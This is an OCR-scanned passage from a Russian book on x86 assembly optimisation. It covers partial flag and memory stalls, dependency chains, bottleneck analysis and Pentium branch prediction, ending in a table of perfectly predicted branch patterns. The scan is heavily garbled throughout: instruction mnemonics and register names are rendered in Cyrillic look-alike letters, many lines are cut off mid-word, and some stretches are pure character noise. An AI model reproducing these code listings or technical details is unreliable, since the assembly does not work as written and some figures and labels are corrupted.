СНВ ЕАХ,1 / ОВ ЕАХ,ЕАХ / РОЗНЕР ; нет задержки 
‚ТЕЗТ ЕВХ,ЕВХ / ГАНЕ ;} задержка 

АМЬ ЕВХ,ЕВХ / БАНЕ ; нет задержки 

ТЕЗТ ЕВХ,ЕВХ / $ЕТА АБ ; нет задержки 

СЬС / 5ЕТА АБ ; задержка 

СЬр / ЗЕТА АБ ; нет задержки 


Потери при частичной задержке флагов примерно равны 4 тактам. 
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6.19.3. Задержки флагов после сдвигов и вращений 


При чтении любого флагового бита после обычного или циклического сдвигов (кроме 


сдвигов на 1 бит, так называемая короткая форма) может возникнуть задержка, похожая 
на частичную задержку флагов. 


УНВ ЕАХ,1 / 7 ХХ ; нет задержки 
НВ ВАХ,2 / а ХХ ; задержка 
НВ ЕАХ,2 / ОВ ЕАХ,ЕАХ / 92 ХХ ; нет задержки 
УНВ БАХ, 5 / 9С ХХ ; задержка 
ЗН ЕАХ, 4 / $НВ ЕАХ,1 / 9С ХХ ; нет задержки 


ЗНВ ВАХ, СЬ / 942 ХХ ; задержка, даже если СЫ = 1 


$НВР ВАХ, ЕВХ,1 / 417 ХХ ; задержка 
ВОГ ЕВХ,8 / 395 ХХ ; задержка 
Потери для этого вида задержек приблизительно равны 4 тактам. 


6.19.4. Частичные задержки памяти 


Частичная задержка памяти похожа на частичную задержку регистра. Она случается, 
когда смешиваются размеры данных применительно к одному адресу в памяти. 


МОУ ВУТЕ РТВ [Е5Т], АБ 


МОУ ЕВХ, РМОВР РТК [ЕЗТГ] ; частичная задержка в памяти 


Здесь случается задержка, потому что процессор должен скомбинировать байт, запи- 
санный из АГ. с тремя следующими байтами, которые были в памяти раньше, чтобы по- 


лучить все четыре байта, необходимые для произведения записи в ЕВХ. Потери прибли- 
зительно равны 7 — 8 тактов. 


В отличии от частичных задержек регистра, частичная задержка памяти случается, 
когда операнд записывается в память, а затем читается его часть, если она не начинается 
по тому же адресу. 


МОУ РИОКР РТВ [Е5Т], ЕАХ 
МОУ ВЫ, ВУТЕ РТВ [Е5Т] 


; нет задержки 
МОУ ВН, ВУТЕ РТВ [Е51+1] 


} задержка 


Можно избежать этой задержки, если изменить иструкцию в последней строке на 
МОУ ВН, АН', но подобное решение невозможно в такой: 


ГГОТР ОМОВР РТВ [ЕРГ} 
МОУ БАХ, РИОВО РТВ [ЕРТ] 


МОУ ЕБХ, РИКОВР РТК [Е01Т+4] ; задержка 
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Интересно, что частичная задержка памяти может также случиться при записи и Чтении 
совершенно разных адресов, если у них одинаковое зе-значение в разных банках кэша. 


МОУ ВУТЕ РТК [ЕТ], АБ 
МОУ ЕВХ, ОМОВР РТВ [Е51+4092] ; нет задержки 
МОУ ЕСХ, РМОВР РТВ [Е51+4096] ; задержка 


6.20. Цепочечные зависимости (РРго, Р2 и РЗ) 


Последовательности инструкций, где выполнение каждой из них зависит от результа: 
предыдущей, называется цепочечной зависимостью. Формирования больших цепочек ну-.. 
но по возможности избегать, потому что они делают невозможным изменение порядк 
выполнения и распараллеливание инструкций. 


МОУ БАХ, [МЕМТ] 
АБР ЕАХ, [МЕМ2} 
АРР БАХ, [МЕМЗ] 
АБР ЕАХ, [МЕМА4} 
МОУ [МЕМЗ], БАХ 


В этом примере инструкция АБО генерирует 2 мопа: один для чтения из памяти (порт 

2) и один для сложения (порт 0 или 1). Моп чтения может выполняться не по порядку, 

в то время как моп сложения дожен ждать, пока выполниться предыдущий. Эта цепочка 

зависимости занимает не очень много времени, так как каждое сложение требует только 

один такт. Но если в коде содержатся медленные инструкции, такие, как умножение или, 

еще хуже, деление, тогда нужно избавляться от цепочечной зависимости. Это можно 
‚ сделать, используя различые приемы. 


МОУ ЕАХ, [МЕМ1] ; начало первой цепочки 

МОУ ЕВХ, [МЕМ2] ; начало второй цепочки с другим приемником 
ТМОЬ ВАХ, [МЕМЗ] 

ТМ ЕВХ, (МЕМА] 

ТмМОЬ ЕАХ, ЕВХ ; в конце соединяем цепочки 

МОУ [МЕМ5], БАХ 


Здесь вторая инструкция 1МОЕ может начаться до того, как будет завершено выпол 
нение первой. Так как инструкция ГМОГ, вызывает задержку в 4 такта и полностью кон” 
вейеризована, вы можно использовать до 4-приемников. 

Деление не конвейеризовано, и, соответственно, невозможно делать то же самое со свя” 
занными делениями, но, разумеется, можно перемножить все делители и сделать только 
одно деление в конце. 

У инструкций с плавающей запятой более длинная задержка, чем у целочисленных 
инструкций, поэтому стоит разбивать слишком длинные цепочки связанных инструкций 


с плавающей запятой. 


} 
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РЬР [МЕМ1] ; начинаем первую цепочку 
ЕР [МЕМ2] ; начинаем вторую цепочку с другим приемником 
РАРР [МЕМЗ] 
ЕХСН 
РАБО [МЕМА} 
Г ЕХСН 
ФАРР [МЕМ5} 
РАРР ; соединяем цепочки в конце 
ЕРОТР [МЕМб] 


Для этого потребуется некоторое количество инструкций ЕХСН, однако они нересур- 
соемки. Инструкции ЕХСН обрабатываются в КАТ с помощью переименования регист- 
ров, поэтому они не создают никакой назгрузки на порты выполнения. Тем не менее, 
ЕХСН генерирует один моп в ВАТ, КОВ и в станции вывода из обращения. 

Если цепочка зависимости очень длинная, может потребоваться три приемника. 








РЬР [МЕМ1] ; начинаем первую цепочку 

РЫР [МЕМ2] ; начинаем вторую цепочку 

РЬР [МЕМЗ] ; начинаем третью цепочку 

РАРР [МЕМ4] ; третья цепочка | 

ЕХСН $Т(1) 

ЕАРР [МЕМ5} ; вторая цепочка 

РХСН $Т{(2) 

РАБР [МЕМб] ; первая цепочка 

ЕХСН $Т{1)} 

РАБО [МЕМ7}] ; третья цепочка 

ЕХСН 5$Т{2) 

РАБР [МЕМ8] ; вторая цепочка 

ЕХСН $Т{1) | 

РАБО ; соединяем первую и третью цепочку 
ЕАБР ; результат соединяем со второй цепочкой 
РЗТР [МЕМУ] 


Следует избегать сохранения промежуточных данных в памяти и немедленного их 
считывания отт уда. 


МОУ [ТЕМР], 
МОУ ЕВХ, 


ЕАХ 
[ТЕМР] 


Возникают потери из-за попытки чтения из памяти до того, как будет завершена пре- 
дыдущая запись по тому же адресу. В вышеприведенном примере можно изменить 


последнюю инструкцию на 'МОУ ЕВХ, ЕАХ' или поместить какие-нибудь уместные 
инструкции между ними. 
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Есть одна ситуация, когда можно избежать сохранения промежуточных данны, 
в памяти. Она возникает тогда, когда осуществляется перемещение данных из цело. 
численного регистра в регистр ЕРИ или наоборот. Например: 


МОУ ЕАХ, [МЕМТ] 
АБР БАХ, [МЕМ2] 
МОУ [ТЕМР], ЕАХ 
Е [ТЕМР] 

Если нечего поместить между записью в ТЕМР и считыванием из него, можно 
использовать регистр с плавающей запятой вместо ЕАХ. 


ЕТО [МЕМ1] 
РТАРР [МЕМ2] 


Последовательные переходы, вызовы или возвраты также можно считать цепочечны- 
ми зависимостями. Производительность этих инструкций равна одному переходу за два 
такта. Поэтому рекомендуется загружать микропроцессор какой-нибудь полезной рабо- 
той между переходами. 


6.21. Поиск узких мест (РРго, Р2 и РЗ) 


Оптимизируя код для процессоров РРго, Р2 и Р3, важно проанализировать, где нахо- 
дятся узкие места. Оптимизация одного узкого места не будет иметь смысла, если есть 
другие более серьезные. 

Если ожидаются потери при работе с кэшем, нужно перегруппировать код, чтобы 
наиболее часто используемые его части были ближе друг к другу. 

Если вы ожидается много потерь при работе с кэшем данных, нужно забыть обо всем др. - 
гом и сконцентрироваться на том, как реструктуризовать данные, чтобы снизить потери (раз? 
6.7) и избежать длинных цепочечных зависимостей при неоптимальной работе с кэшем. 

Если требуется большое количество операций деления, можно попробовать прегру!- 
пировать инструкции так, чтобы процессору было чем заняться во время их обработки. 

Цепочечные зависимости мешают изменению порядка выполнения инструкций (разл 
6.20). Нужно разрывать длинные цепочечные зависимости, особенно, если они содержат 
медленные инструкции, такие, как умножение, деление и инструкции плавающей запятой. 

Если в коде много переходов, вызовов или возвратов, особенно, если переходы плохо 
предсказуемы, следует выяснить, нельзя ли избежать некоторых из них, заменить услов` 
ные переходы условными перемещениями, если это возможно, а небольшие процедуры 
макросами. 

В случае смешивания данных разной размерности (8, 16 и 32 бит), нужно следит? 
за появлением частичных задержек. Для инструкций РОЗНЕ или Г.АНЕ обязательно от 
слеживание появления частичных задержек флагов, избегайть тестирования флагов 10” 
сле сдвигов больших, чем на | (разд. 6.19). 
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опозоа ев ини и оное яве ниининаниии иона оци носи ными ива оовпо оо оон а ко нненования 
шеи 


Га ии 

Если ориентироваться на производительность в 3 мопа за такт, нужно следить за перебоя 
мив доставке инструкций и их раскодировке (разд. 6.14 и 6.15), особенно в коротких циклах. 

Ограничение на чтение максимум из двух постоянных регистров может снизить про 
изводительность до уровня, меньшего, чем 3 мопа за такт. Это может случиться, если 
происходит частое считывание регистров, по истечении 4 тактов с момента их последне- 
го изменения. Это может, например, случиться, при использовании указатели для адре- 
сации памяти с редкой их модификацией. 

Производительность в 3 мопа за такт требует, чтобы любой порт выполнения получал 
не больше 1/3 всех мопов (раздел 6.17). 

Станция вывода из обращения может обрабатывать 3 мопа за такт, но может быть 
менее эффективной при работе с предсказанными переходами (разд. 6.18). 


6.22. Команды передачи управления 


Процессоры семейства Репйит пытаются предсказывать, когда произойдет безуслов- 
ный переход и будет ли осуществлен условный. Если предсказание оказывается верным, 
это может сэкономить ощутимое время, так как в конвейер будут загружены последующие 
инструкции и начнется их раскодировка еще до того, как будет осуществлен сам переход. 
Если предсказание оказывается неверным, тогда конвейер должен быть очищен, что вызо- 
вет потери производительности, количество которых зависит от длины конвейера. 

Предсказания основываются на буфере переходов (ВТВ — БгапсН {агое{ Баг), кото- 
рый сохраняет историю каждого перехода и делает предсказания, основываясь на пре- 
дыдущих результатах выполнения каждой инструкции. ВТВ организован как множест- 
венно-ассоциативный (5е{-аззосаНуе) кэш, в котором новые элементы используются 
согласно псевдослучайному методу замещений. 

Оптимизируя код важно снижать количество возможных неправильных предсказаний 
переходов. Это можно сделать при хорошом понимании того, как работает механизм 
предсказания переходов. 

Механизм предсказания переходов конкретно не объясняется ни в руководствах от 
ие], ни где-нибудь еше, поэтому здесь приводится детальное описание. Эта информация 
основывается на исследованиях Апэег Роз и КагК! Мепага Вавадиг. 

Далее под термином "команда передачи управления" будет подразумеваться любая инст- 
Рукция, которая меняет еф, включая условные и безусловные, прямые и косвенные, ближние 
и дальние переходы, вызовы и возвраты. Все эти инструкции используют предсказание. 
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6.22.1. Предсказывание переходов в Р1 


Механизм предсказывания переходов в Р1 очень отличается от того, как это реализо. 
вано в в последующих поколениях процессоров. Информация, найденная по этой теме 
в документах от Пе! и других источниках противоречива. 

УР! есть буфер переходов ВТВ, который может содержать информацию о 256 инструк. 
циях перехода. ВТВ организован в виде 4-направленного множественно-ассоциативного кэша 
по 64 элемента в каждом направлении. Это означает, что ВТВ может содержать не больше 
чем 4 элемента для каждого зе значения. Как выбирается конкретное зе{-значение будет объ- 
яснено позже. Каждый элемент ВТВ хранит адрес, куда должен быть совершен переход и 
состояние предсказания, которое может иметь три разных значения: 


Ш состояние 0: "не будет осуществлен" 

Ш состояние 1: "возможно не будет осуществлен" 
@ состояние 2: "возможно будет осуществлен" ° 
Ш состояние 3: "будет осуществлен" 


Инструкция перехода будет осуществлена, когда состояние ВТВ равно 2 или 3. 
и пропускается при состоянии 0 или 1. Состояние перехода работает как двухбитный 
счетчик, поэтому состояние увеличивается на 1, если переход был осуществлен. 
и уменьшается на 1, если этого не произошло. Понижение и повышение значения проис- 
ходит по принципу "насыщения", т. е. значение не может понизиться ниже 0 (и стать 3} 
и не может повыситься выше 3 (и стать 0). По идее, все это должно привести к довольно 
хорошему проценту правильных предсказаний, потому что до того, как будет изменено 
предсказание, инструкция перехода должна быть выполнена два раза. 

Тем не менее, этот механизм может быть скомпрометирован тем, что состояние 
0 также означает "неиспользованный элемент ВТВ". Поэтому элемент ВТВ с состоянием 
0 означает примерно то же, что если бы его вообще не было. Это имеет смысл, потом 
что если у инструкции перехода нет соответствующего элемента ВТВ, предсказывается. 
что она не будет осуществлена. Это улучшает использование ВТВ, так как инструкция 
перехода, которая редко осуществляется, болыную часть времени не будет занимать 
никакого элемента ВТВ. 


Если у инструкции перехода нет своего элемента в ВТВ, генерируется такой элемент 


и значение его состояния будет установлено в 3. Это означает, что перейти от состояния. 
0 к состоянию 1 невозможно (кроме очень специфических случаев, обсуждаемых позже). 9: 
От состояния 0 можно перейти только к состоянию 3, если инструкция перехода будет 3. 


выполнена. Если этого не произойдет, она не получит свой элемент в ВТВ. 


Это серьезный промах в дизайне архитектуры процессора Р1. Очевидно, что таким обра- $. 
зом дизайнеры отдали предлочтение минимизации потери производительности при загрузке 
в первый раз часто выполняющихся инструкций перехода и проигнорировали то, что это } : 
`серьезно искажает первоначальную идею и снижает производительность в коротких внутрен- 
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‘циклах. Следствием этого изъяна явлется то, что инструкция перехода, которая большую 
часть времени не выполняется, может иметь в три раза больше неправильных предсказаний, 
чем инструкция перехода, которая большую часть времени выполняется. 

Можно принимать эту ассиметричность в расчет, организовав ветви так, чтобы они 
чаше выполнялись, а не пропускались. Пример конструкции Ш Феп-ебе: 


ТЕЗТ ЕАХ, ЕАХ 
95 А 
<ветвь 1> 
МР Е 
А: <ветвь 2> 
6: 


Если ветвь 1 выполняется чаще, чем ветвь 2, а последняя выполняется реже в два 
раза, тогда можно снизить количество неправильных предсказаний, поменяв две ветви 
так, чтобы инструкция перехода выполнялась чаще, чем пропускалась: 

ТЕТ ВАХ, ЕАХ 
9№Р А 
<ветвь 2> 
МР Е 


А: <ветвь 1> 
Е: 


(Это противоречит рекомендациям 111). 
Тем не менее, есть причины чаще помечать выполняющуюся ветвь первой: 


Ш помещение редко используемых ветвей подальше от основного кода делает использо- 
вание кода кэша более оптимальным, 


Ш редко выполняющаяся инструкция перехода не будет напрасно занимать элемент 
ВТВ, что, вероятно, сделает использование ВТВ более оптимальным. 


® инструкция перехода будет предсказана как не выполняющаяся, если она была 
вытеснена другими инструкциями из ВТВ; 

® ассиметричность предсказывания переходов существует только в Р1]. 
Впрочем, эти предположения не играют никакой роли для коротких циклов. 


Вместе с этим следует организовать циклы таким образом, чтобы проверка услови; 
производилась ближе к его концу: 


МОУ ЕСХ, [№] 
ь: МОМ [ЕОТ], БАХ 

АОЬ ЕОГ, 4 

ВЕС БСХ 

м2 Ь 


Если М велико, тогда инструкция ЛМЯ, будет чаще выполняться, чем пропускаться. 
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Представим ситуацию, когда инструкция перехода выполняется каждый второй ра. 
В первый раз она попадает в ВТВ с состоянием 3, а затем будет колебаться межд. 
состояниями 2 и 3. Каждый раз будет предсказываться, что она выполниться, но только 
50% этих предсказаний будет верными. Теперь предположим, что однажды она отклони. 
лась от привычного поведения и была пропущена. После этого происшествия элемент 
ВТВ будет колебаться между состояниями | и 2, что будет давать 100% неправильных 
предсказаний. И так будет продолжаться, пока не случиться еще одно отклонение. Это 
худшее, что может произойти в работе этого механизма предсказания переходов. 


6.22.1.2. ВТВ смотрит вперед (Р1). Механизм ВТВ подсчитывает инструкции попар- 

но, а не по отдельности, поэтому нужно знать, как инструкции спариваются, чтобы 
суметь проанализировать, где хранится элемент ВТВ. Элемент ВТВ для любой управ- 
ляющей инструкции присоединяется к адресу инструкции в Ч-конвейере из предыдущей 
пары инструкций (неспариваемая инструкция идет за одну пару). 

ЗНВ БАХ, 1 

МОУ ЕВХ, [ЕЗГ] 

СМР БАХ, ЕВХ 

ов Ь 


Здесь ЗНВ спаривается с МОХ, а СМР спаривается с ЛВ. ВТВ-элемент для '7В Г при- 
соединяется к адресу инструкции 'ЗНК ЕАХ,Г'. Когда встречается этот ВТВ-элемент, 
ион находится в состоянии 2 или 3, Р1 считает целевой адрес из элемента ВТВ и загру- 
зит инструкции, следующие за [. в конвейер. Это произойдет до того, как будет деколи- 
рована инструкция перехода, поэтому Р1 полагается исключительно на информацию, 
содержащуюся в ВТВ, когда делает это. 

Как известно, инструкции редко спариваются с первого раза (см. разд. 6.8). До того 
пока инструкции не спарились, элемент ВТВ будет присоединен к адресу инструкции 
СМР. Тем не менее, в большинстве случаев Р1 достаточно умен, чтобы не выполнять 
элемент ВТВ при неиспользованной возможности спаривания, поэтому ВТВ-элемент 
сформируется только при втором выполнении, а следовательно, предсказания начнутся 
только с третьего. Лишь в случае, когда каждая вторая инструкция будет иметь размер 
в один байт, элемент ВТВ может сформироваться уже при первом выполнении, и ок 
жется недествительным при втором, но так как инструкция, к которой был присоединее 
элемент, попадет в \У-конвейер, она будет проигнорирована не вызовет особых потерь. 
Элемент ВТВ считывается только тогда, когда он присоединен к адресу инструкций 
для О-конвейера. 

ВТВ-элемент идентифицируется своим зе-значением, которое соответствует битам 0. 
5 адреса, к которому он присоединен. Биты 6-31 сохраняются в ВТВ как тег. Адрес? 
которые кратны 64 байтам, будут иметь одно и то же зе-значение. Можно располагать 
не более четырех ВТВ-элементов с одинаковым зе-значением. Если требуется прове” 
рить, не будет ли ваша инструкция перехода конфликтовать с другой инструкцией 
за один и тот же элемент ВТВ, необходимо сравнить биты 0-5 адресов инструкций, на: 
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правляющихся в О-конвейер, из предыдущих пар. Это тяжело сделать вручн} 
более что нет никаких инструментов, которые могли бы автоматизировать эту раб 

6.22.1.3. Последовательные ветви (Р1). Когда переход пресдказан неправилы 
вейер очищается. Если следующая пара инструкций также содержит управляющу 
рукцию, то Р1 не будет загружать ее, так как он не может этого сделать, пока к 
не очищен. В результате вторая инструкция предсказывается как невыполняюще 
зависимости от состояния элемента ВТВ. Поэтому, если второй переход также ви 
ется на самом деле, то результат — дополнительные потери. Состояние ВТВ-элеме 
второго перехода будет, тем не менее, правильно установлено. Если есть длиная | 
инструкций передачи управления, и первый переход в цепочке был предсказан 
вильно, тогда конвейер будет постоянно очищаться и предсказания будут по 
неправильными, пока не будет встречена пара инструкций, в которой не будет пе 
Самый экстремальный случай подобного рода — это цикл, в котором происходят 
при каждой итерации из-за постоянного неправильного предсказания. 

Это не единственная проблема с последовательными управляющими инстру 
Другая проблема состоит в том, что может быть другая управляющая инструкци; 
ВТВ-элементом и управляющей инструкцией, принадлежащей ему. Если перва 
рукция производит переход, то могут произойти странные вещи. Рассмотрим сле) 
пример 

НВ КАХ, 1 
МОУ БВХ, [Б5Т} 
СМР КАХ, ЕВХ 


В Ь1 
ЗМР Ь2 


Ь]: МО\ БАХ, БВХ 
ТС БВХ 


Когда '7В 1" пропускается, элемент ВТВ присоединяется к адресу "СМР ЕА 
Но что случится, если 'УВ [1' будет выполнена? В тот момент когда считывает 
элемент для 'УМР [-2', процессор не знает, что следующая пара инструкций не с‹ 
команду перехода, поэтому он фактически предскажет, что пара инструкни} 
ЕАХ,ЕВХ / 1\С ЕВХ' перейдет на 1.2. Потери, связанные с предсказанием инст 
не являющихся командами перехода, равны 3 тактам. Элемент ВТВ для 'МР 1.2' | 
‘вое состояние на один, потому что он должен совершать перхода. Если перей 
Тогда состояние элемента ВТВ для ']МР 1.2' будет понижежено до 1 и 0, поэтому 
Проблема исчезнет, пока снова не будет выполнено ']МР 1.2". 

Потери при предсказании инструкций, не являющихся управляющими, случаютс: 
Тогда, когда предсказавыется переход на 11. В случае если выполнение ')В Г.1' пре; 
Эшибочно, тогда конвейер очищается и неверной загрузки цепочки 1.2 не случится, | 














ИО 
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случае потеря от предсказания неуправляющих инструкций как выполняющихся будет несу. 
щественна, но состояние элемента ВТВ для 'ЛМР 1.2" будет понижено. 

Заменим инструкцию 'П\С ЕВХ’ на инструкцию перехода. Тогда третья инструкция 
перехода будет использовать тот же элемент ВТВ, что и '7МР 1.2", что приводит к возмож. 
ным потерям из-за предсказания неправильной цели (если только целью не является 1.2), 

Теперь прорезюмируем возможные проблемы, к которым. могут привести последова. 
тельные переходы: 


№ невозможность загрузить цель перехода, когда конвейер очищается из-за предыдущь. 
го неправильно предсказанного перехода; 

Ш элемент ВТВ может быть присоединен не к инструкции перехода и предсказать и) 
как выполняющиеся; 

# второе последствие вышеизложенного — неправильно присоединенный элемент ВТВ 
будет понижать свое состояние, что может привести к последующему неправильном, 
предсказанию перехода, к которому он принадлежит. Даже безусловные переходы 
из-за этого могут быть предсказанны как невыполняющиеся; 

ы две инструкции перехода могут использовать один и тот же элемент ВТВ, что может 
привести к предсказанию неправильной цели. . 


Вся эта путаница может привести к многчисленным потерям, поэтому нужно избегать 
пар инструкций, содержащих переход, находящихся непосредственно после плохо прех- 
сказуемой инструкции передачи управления. 

Рассмотрим еще один показательный пример: 


САБЬ Р 
ТЕЗТ БАХ, БАХ 
92 ь2 
Ь1: МОУ [ЕОГ),ЬВХ 
р Ар. ЕОТ, 4 
ВЕС БАХ 
92 Ь1 
Ь2: САБЬ Р 


На первый взгляд, как будто все в порядке: вызов функции, цикл, который пропуска 
ется, если счетчик равняется нулю, и другой вызов функциии. Какие проблемы могу! 
возникнуть? 

Сначала можно заметить, что функция Р вызывается из двух различных мест кода. 
Это означает, что цель возврата из Р будет все время меняться. Соответственно, возврат 
из Р будет все время предсказываться неправильно. 

Теперь предположим, что ЕАХ равен нулю. При переходе на 1.2 его цель не будет 
загружена, так как неправильно предсказанное возвращение приведет к очистке конвей 
ера. Затем цель второго вызова Р также не будет загружена, потому что ‘47. 1.2" вызовет 


_ РЦ о 
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новую очистку конвейера. Здесь возникает ситуация, в которой цепь последователь 
переходов заставляет постоянно очищаться конвейер из-за того, что первый переход 
предсказан неправильно. Элемент ВТВ для '77 1.2" определяется по адресу инструк 
возврата из функции Р. Этот элемент ВТВ будет теперь неправильно присоединен к 
му, что должно быть после второго вызова Р, но это не приводит к потерям, так как к 
вейер очищается из-за неправильно предсказанного второго возврата. 

Нужно посмотреть, что случитсья, если ЕАХ не будет равен нулю в следующий | 
7, 12' будет всегда предсказываться как невыполняющийся из-за очистки конвей‹ 
Второй вызов 'САШ. Р’ будет иметь элемент ВТВ указывающий на '"ТЕЗТ ЕАХ.ЕА 
Этот элемент будет неправильно ассоциирован с парой 'МО\У/АОР', предсказывая пе 
ход на Р. Это приведет к очистке конвейера, который не даст загрузить цель 'ЛМ7, 
Второй вызов 'САТ. Р' будет иметь в ВТВ элемент с адресом 'РЕС ЕАХ'. При вто] 
и третьем повторении цикла этот элемент также будет неправильно ассоциирован с 
рой 'МОУ/АОГ,, пока ее состояние не понизится до 1 или 0. Это не вызовет пот 
во втором выполнении, так как очистка конвейера от 'ЛМ7. [!' не даст загрузить невер! 
цель, но в третий раз так и случится. Последовательные итерации цикла не приво 
кпотерям, но если они есть, то Л\Я, [1 будет предсказан неправильно. Очистка буф 
сделает невозможной загрузку цели 'САШ. Р', не считая того, что ее элемент ВТВ | 
был уничтожен несколькими неправильными ассоциированиями. 

Можно улучшить этот код, поместив несколько МОР’ов, чтобы отделить послед. 
тельные переходы друг от друга: 


САБЬ Р 
ТЕЗТ БАХ, БАХ 
МОР 
98 ь2 

Ь1: МОУ [601], ЕВХ 
Ар ВОТ, 4 
ВЕС БАХ 
9 Ь1 

Ь2: МОР 
МОР 
САЬЬ Р 


Дополнительные МОР требуют 2 такта, но они сэкономят гораздо больше. Более т 
2. Т.2' теперь перемещяется в О-конвейер, что снижает потери в случае неправиль 
предсказания с 4 до 3 тактов. Единственная оставшаяся проблема — это возвраты и 
которые всегда предсказываются неправильно. Эту проблему можно решить, заме 
вызов Р на макрос (если есть достаточно свободного места в кэше кода). 

Урок, который можно извлечь из этого примера, заключается в том, что стоит внут 
тельно контролировать последовательные переходы и смотреть, можно ли сэконом 
немного времени с помощью нескольких дополнительных МОР. Следует избегать тг 
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ситуаций, когда неправильное предсказание неибежно, например, выходы из ци 
и возвращения из процедур, вызываемых из разных мест. Если есть что-либо поле 
что можно поместить вместо МОР, естественно, это следует сделать. 

Точки множественного ветвления (условные выражения) можно строить либо в Ви 
дерева инструкций переходов, либо в виде списка адресов переходов. Если выб а 
дерево инструкций переходов, нужно будет включать некоторое число операций МОР 
или других адкватных инструкций, чтобы отделить последовательные переходы дру 
от друга, поэтому список адресов может быть более выгодным вариантом на Р1. Список 
адресов переходов следует помещать в сегменте данных, а не в сегменте кода! 


6.22.1.4. Короткие циклы (РТ). В коротких циклах часто происходит обращение к од. 
ному и тому же элементу ВТВ с небольшими интервалами. Вместо того чтобы ждать 
когда обновится элемент ВТВ, Р1 каким-то образом минует конвейер и получает состоя. 
ние после последнего перехода, прежде чем оно записывается в ВТВ. Этот механизм 
почти прозрачен для пользователя, но в некоторых случаях он приводит к забавным 3$. 
фектам: можно видеть предсказание перехода от состояния 0 к состоянию 1, а не к со- 
стоянию 3, если ноль еще не был записан в ВТВ. Это случается, если в цикле не больше 
четырех пар инструкций. В цикле с двумя парами инструкций может случиться так, что 
состояние 0 сохраняется на протяжении двух итераций, причем элемент не стирается из 
ВТВ. В коротких циклах в редких случаях предсказание использует состояние, которое 
было два цикла назад, а не в предыдущем повторении. Эти эффекты обычно не приводят 
к снижению производительности. ‘ 


КЛов 
ЗНое 


6.22.2. Предсказание переходов в РММХ, РРго, Р2 и РЗ 


6.22.2.1. Организация ВТВ (РММХ, РРго, Р2 и РЗ). Буфер переходов (ВТВ) РММХ 
состоит из 256 элементов, организованых как 16 направлений * 16 множеств. Каждый 
элемент идентифицируется битами 2 — 31 адреса последнего байта инструкции передачи 
управления, которой он принадлежит. Биты 2 — 5 определяют множество, а биты 6 - 31 
сохраняются в ВТВ как тег. Инструкции передачи управления, находящиеся друг от дру- 
га на расстоянии 64 байт, имеют одинаковое зе-значение и поэтому могут случайно вы 
теснять друг друга из ВТВ | 

Буфер переходов РРго, Р2 и РЗ имеет 512 элементов (16 направлений * 32 множества). 
Каждый элемент идентифицируется битами 4 — 31 адреса последнего байта инструкций 
передачи управления, к которой он принадлежит. Биты 4 — 8 определяют множество, и все 
биты сохраняются в ВТВ как тег. Инструкции передачи управления, которые находятся 
друг от друга на расстоянии 512 байт, могут случайно вытеснять друг друга из ВТВ. 

РРго, Р2 и РЗ резервируют элемент ВТВ для любой инструкции передачи управления 
в первый раз ее выполнения (независимо от того, совершает ли она переход, или пропус" 
кается). РММХ резервирует элемент в первый раз, когда совершается переход. Инструк 
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„ перехода, которая никогда не совершает переход, будет оставаться вне ВТВ на 
МХ. Как только она однажды совершит переход, она окажется в ВТВ и будет оста- 
и ться там все время, даже если она никогда больше не будет совершать переход. 
элемент может быть вытеснен из ВТВ, когда другой инструкции передачи управле- 
ния с тем же самым 5е{-значением требуется элемент ВТВ. 


6.22.2.2. Потери при неверном предсказании (РММХ, РРго, Р2 и РЗ). НаРММХ поте- 
и из-за неверного предсказания условного перехода равны 4 тактам для инструкции 
в \-конвейере и 5 тактам, если она выполнялась в \У-конвейере. Для всех других инст- 
укций передачи управления потери равны 4 тактам. 

На РРго, Р2 и РЗ потери из-за неверного предсказания очень высоки, так как у этих 
процессоров длинный конвейер. Неправильное предсказание обычно от 10 до 20 тактов. 
Поэтому очень важно избегать плохо предсказуемых ветвей, если программа будет 
выполняться на РРго, Р2 и РЗ. 


6.22.2.3. Распознавание последовательностей условных переходов (РММХ, РРго, Р2 
иРЗ). У данных процессоров есть продвинутый механизм распознавания последователь- 
ностей переходов, который может правильно предсказать выполнение инструкций пере- 
ходов даже если переход осуществляется только каждый четвертый. Фактически они 
могут предсказать любую повторяющуюся последовательность переходов и не- 
переходов, если период не превьшшает пяти, и многие последовательности с более высо- 
кими периодами. 

Этот механизм называется "двухуровневой адаптирующейся схемой предсказания". 
Он был изобретен Т.-У. Уей и У. М. Рай. Механизм основывается на разновидности 
двухбитного счетчика, использующихся в Р1 (но без изъяна, описанного выше). Счетчик 
увеличивается, когда совершается переход и уменьшается, в противном случае. Нет 
автоматического обнуления при повышении 3 или приравнивания к 3 при понижении 0. 
Инструкция перехода предсказывается как выполняющаяся, если соответствующий 
счетчик равен 3 или 3, и предсказывается как несовершающая пере од, если он равен 0 
или 1. Значительное улучшение данного алгоритма было получено путем введения 16 
таких счетчиков для каждого элемента ВТВ. ВТВ выбирает один из этих шестнадцати 
счетчиков, основываясь на истории выполнения переходов за четыре последних раза. 
Если инструкция перехода совершает его и затем не делает этого три раза подряд, тогда 
биты истории равняются 1000 (1 = переход, 0 = не-переход). Значит, будет использовать- 
ся счетчик под номером 8 (1000Ъ = 8) для предсказания в следующий раз и обновления 
состояния счетчика. 

Если последовательность 1000 всегда следует за 1, тогда счетчик под номером 8 
вскоре достигнет своего наивысшего состояния (3), что означает постоянное предсказы- 
вание последовательности 1000. Потребуется два отклонения от этой последовательно- 
сти, чтобы изменить предсказание. Повторяющаяся последовательность 100010001000 
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будет иметь счетчик 8 в состоянии 3 и счетчик 1, 2 и 4 в состоянии 0. Другие двена дцат 
счетчиков не будут использоваться. 

6.22.2.4. Последовательности, предсказанные совершенно (РММХ, РРго, Р2, р}. 
Повторяющаяся последовательность предсказывается совершенно этим механизмо, 
если каждая 4-битная подпоследовательность полного периода уникальна. Ниже пре; 
ставлен список последовательностей, которые предсказываются совершенно. 


Таблица 6.6. Совершенно предсказанные последовательност 





период совершенно предсказанные последовательнотси 

1-5 все 

6 000011, 000101, 000111, 001011 

7 0000101, 0000111, 0001011 

8 00001011, 00001111, 00010011, 00010111, 00101101 

9 000010011, 000010111, 000100111, 000101101 ` 

10 0000100111, 0000101101, 0000101111, 0000110111, 0001010011, 0001011101 

11 00001001111, 00001010011, 00001011101, 00010100111 

12 000010100111, 000010111101, 000011010111, 0001001100111, 0001001111011 

13 0000100110111, 0000100111011, 0000101001111 

14 00001001101111, 00001001111011, 00010011010111, 00010011101011, 
00010110011101, 00010110100111, 000010011010111, 000010011101011, 
000010100110111 

15 000010100111011, 000010110011101, 000010110100111, 000010111010011, 
000011010010111 

16 0000100110101111, 0000100111101011, 0000101100111101, 0000101101001111 


Читая табл. 6.6, необходимо учитывать учитывать, что если последовательность 
